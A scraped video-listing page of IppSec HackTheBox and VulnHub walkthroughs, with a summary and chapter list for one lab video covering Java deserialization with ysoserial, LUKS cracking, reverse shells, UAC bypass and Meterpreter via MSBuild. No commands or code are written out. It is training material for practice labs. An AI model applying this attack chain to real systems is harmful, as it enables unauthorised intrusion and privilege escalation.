28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

This video teaches how to exploit Java deserialization vulnerabilities using Burp Suite and Python, and how to bypass UAC using Metasploit and meterpreter. It also covers post-exploitation techniques and the use of msbuild for payload execution.

Key Takeaways
  1. Run go Buster to brute-force potential vulnerabilities
  2. Use Burp Suite to intercept and analyze HTTP requests
  3. Identify Java deserialization vulnerabilities
  4. Exploit Java deserialization vulnerabilities using Python
  5. Bypass UAC using Metasploit and meterpreter
  6. Use msbuild to execute payload
  7. Migrate to a new process using meterpreter
💡 The video highlights the importance of identifying and exploiting Java deserialization vulnerabilities, and demonstrates how to use tools like Burp Suite and Python to achieve this.

Related AI Lessons

Chapters (28)

0:55 Begin of Recon
2:20 Checking the WebPages
3:50 Examining /userSubscribe.faces, to discover potential deserialization
5:00 Exploring javax.faces.ViewState
5:50 Googling around to see what an unencrypted serialized object should look like
7:15 Checking out SMB to discover an openshare
9:00 Downloading appserver.zip from batshare via smbclient
11:00 Cracking a luks encrypted file with dd and hashcat
14:00 Luks cracked, mounting the disk with luksOpen
16:20 Discovery of the secret used to encrypt the java object
18:10 Creating a python script to decrypt the ViewState to verify we have correct cr
23:10 Script completed, lets test the decryption!
24:15 Downloading ysoserial to create a deserialization CommonCollections gadget
26:00 Creating a python script to exploit the deserialization vuln
31:00 Script complete! We got a ping, testing the MyFaces serialization objects (di
33:00 Modifying the script to run commands other than what ySoSerial provided
41:10 Script updates finished, trying to get a reverse shell via nishang (did not wo
42:40 Trying Invoke-WebRequest, because Net.WebClient did not work. (testing for co
45:00 Downloading netcat to upload to the box
46:00 Netcat returned a powershell reverse shell
47:20 Discovering Backup.zip, downloading, using readpst to convert it to a plaintex
50:00 Using evolution to view mbox file and find Batman's password
52:45 Using Powershell's Invoke-Command to execute commands as Batman (like runas)
55:40 Reverse shell as batman returned! Running a few commands to find out he is lo
58:10 Unintended: Using net use to mount c$ and view the flag
59:30 Checking github hfiref0x/UACME to find a UAC Bypass. Chose one by a fellow HT
1:02:10 Using GreatSCT/MSBuild to launch Meterpreter
1:02:45 While GreatSCT installs, create a DLL to return a reverse shell
Up next
News At 10
Channels Television
Watch →